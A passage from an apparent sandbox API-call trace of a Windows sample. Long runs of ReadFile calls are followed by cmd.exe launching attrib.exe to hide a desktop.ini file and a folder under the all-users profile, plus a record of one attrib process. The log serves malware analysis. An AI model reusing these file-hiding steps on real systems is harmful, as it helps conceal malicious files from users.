lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.345] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, 
lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.346] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.347] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.348] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, 
lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile 
(in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.349] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 
[0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.350] ReadFile (in: hFile=0x58, lpBuffer=0x30eea4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e094, lpOverlapped=0x0 | out: lpBuffer=0x30eea4*, lpNumberOfBytesRead=0x30e094*=0x200, lpOverlapped=0x0) returned 1 [0151.372] _close (_FileHandle=4) returned 0 [0151.375] FindNextFileW (in: hFindFile=0x40e628, lpFindFileData=0x30f108 | out: lpFindFileData=0x30f108) returned 0 [0151.376] GetLastError () returned 0x12 [0151.376] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.376] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0151.382] _close (_FileHandle=3) returned 0 [0151.382] GetConsoleTitleW (in: lpConsoleTitle=0x30f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.383] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0151.383] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0151.383] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0151.383] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", 
fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.383] GetLastError () returned 0x2 [0151.383] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.386] GetLastError () returned 0x2 [0151.386] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0x40e628 [0151.387] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.387] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.387] GetLastError () returned 0x2 [0151.387] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0x40e628 [0151.387] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.387] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0151.387] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0151.387] GetConsoleTitleW (in: lpConsoleTitle=0x30f2d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.387] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f15c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f224 | out: lpAttributeList=0x30f15c, lpSize=0x30f224) returned 1 [0151.387] UpdateProcThreadAttribute (in: lpAttributeList=0x30f15c, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f21c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | 
out: lpAttributeList=0x30f15c, lpPreviousValue=0x0) returned 1 [0151.388] GetStartupInfoW (in: lpStartupInfo=0x30f118 | out: lpStartupInfo=0x30f118*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0151.388] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0151.388] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f1b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f204 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" ", lpProcessInformation=0x30f204*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa20, dwThreadId=0xca8)) returned 1 [0151.391] CloseHandle (hObject=0x50) returned 1 [0151.391] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0151.392] GetEnvironmentStringsW () returned 0x412cb0* [0151.392] FreeEnvironmentStringsW (penv=0x412cb0) returned 1 [0151.392] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0151.441] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f0f8 | out: lpExitCode=0x30f0f8*=0x0) returned 1 [0151.441] CloseHandle (hObject=0x4c) returned 1 [0151.441] _vsnwprintf (in: 
_Buffer=0x30f240, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f104 | out: _Buffer="00000000") returned 8 [0151.441] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0151.441] GetEnvironmentStringsW () returned 0x412cb0* [0151.441] FreeEnvironmentStringsW (penv=0x412cb0) returned 1 [0151.441] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.441] GetEnvironmentStringsW () returned 0x412cb0* [0151.441] FreeEnvironmentStringsW (penv=0x412cb0) returned 1 [0151.441] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f15c | out: lpAttributeList=0x30f15c) [0151.441] GetConsoleTitleW (in: lpConsoleTitle=0x30f540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.442] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0151.442] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0151.442] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0151.442] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.442] GetLastError () returned 0x2 [0151.442] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.442] GetLastError () returned 0x2 [0151.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: 
lpFindFileData=0x30eddc) returned 0x40e628 [0151.443] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0xffffffff [0151.443] GetLastError () returned 0x2 [0151.443] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eddc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eddc) returned 0x40e628 [0151.443] FindClose (in: hFindFile=0x40e628 | out: hFindFile=0x40e628) returned 1 [0151.443] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0151.443] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0151.443] GetConsoleTitleW (in: lpConsoleTitle=0x30f2d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0151.443] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f15c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f224 | out: lpAttributeList=0x30f15c, lpSize=0x30f224) returned 1 [0151.443] UpdateProcThreadAttribute (in: lpAttributeList=0x30f15c, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f21c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f15c, lpPreviousValue=0x0) returned 1 [0151.443] GetStartupInfoW (in: lpStartupInfo=0x30f118 | out: lpStartupInfo=0x30f118*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0151.444] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0151.444] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", 
lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f1b8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f204 | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\"", lpProcessInformation=0x30f204*(hProcess=0x50, hThread=0x4c, dwProcessId=0x300, dwThreadId=0xce8)) returned 1 [0151.446] CloseHandle (hObject=0x4c) returned 1 [0151.446] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0151.446] GetEnvironmentStringsW () returned 0x413668* [0151.446] FreeEnvironmentStringsW (penv=0x413668) returned 1 [0151.446] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0151.486] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f0f8 | out: lpExitCode=0x30f0f8*=0x0) returned 1 [0151.486] CloseHandle (hObject=0x50) returned 1 [0151.486] _vsnwprintf (in: _Buffer=0x30f240, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f104 | out: _Buffer="00000000") returned 8 [0151.486] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0151.486] GetEnvironmentStringsW () returned 0x413668* [0151.486] FreeEnvironmentStringsW (penv=0x413668) returned 1 [0151.486] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0151.487] GetEnvironmentStringsW () returned 0x413668* [0151.487] FreeEnvironmentStringsW (penv=0x413668) returned 1 [0151.487] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f15c | out: lpAttributeList=0x30f15c) [0151.487] _get_osfhandle (_FileHandle=1) returned 0x7 
[0151.487] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0151.487] _get_osfhandle (_FileHandle=1) returned 0x7 [0151.487] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0151.487] _get_osfhandle (_FileHandle=0) returned 0x3 [0151.487] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0151.487] SetConsoleInputExeNameW () returned 0x1 [0151.487] GetConsoleOutputCP () returned 0x1b5 [0151.488] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0151.488] SetThreadUILanguage (LangId=0x0) returned 0x409 [0151.488] exit (_Code=0) Process: id = "241" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16920" os_pid = "0xcfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0xc28" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\MF\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT 